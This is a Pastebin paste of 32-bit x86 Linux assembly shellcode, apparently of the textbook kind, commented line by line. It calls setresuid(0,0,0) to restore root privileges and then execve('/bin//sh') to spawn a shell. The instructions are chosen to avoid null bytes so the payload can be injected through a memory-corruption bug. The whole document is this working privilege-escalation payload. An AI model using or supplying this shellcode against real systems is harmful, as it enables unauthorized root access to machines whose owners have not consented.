Data hosted with ♥ by Pastebin.com - Download Raw - See Original
  1. BITS 32
  2.  
  3. ; setresuid(uid_t ruid, uid_t euid, uid_t suid);
  4.   xor eax, eax      ; zero out eax
  5.   xor ebx, ebx      ; zero out ebx
  6.   xor ecx, ecx      ; zero out ecx
  7.   cdq               ; zero out edx using the sign bit from eax
  8.   mov BYTE al, 0xa4 ; syscall 164 (0xa4)
  9.   int 0x80          ; setresuid(0, 0, 0)  restore all root privs
  10.  
  11. ; execve(const char *filename, char *const argv [], char *const envp[])
  12.   push BYTE 11      ; push 11 to the stack
  13.   pop eax           ; pop dword of 11 into eax
  14.   push ecx          ; push some nulls for string termination
  15.   push 0x68732f2f   ; push "//sh" to the stack
  16.   push 0x6e69622f   ; push "/bin" to the stack
  17.   mov ebx, esp      ; put the address of "/bin//sh" into ebx, via esp
  18.   push ecx          ; push 32-bit null terminator to stack
  19.   mov edx, esp      ; this is an empty array for envp
  20.   push ebx          ; push string addr to stack above null terminator
  21.   mov ecx, esp      ; this is the argv array with string ptr
  22.   int 0x80          ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])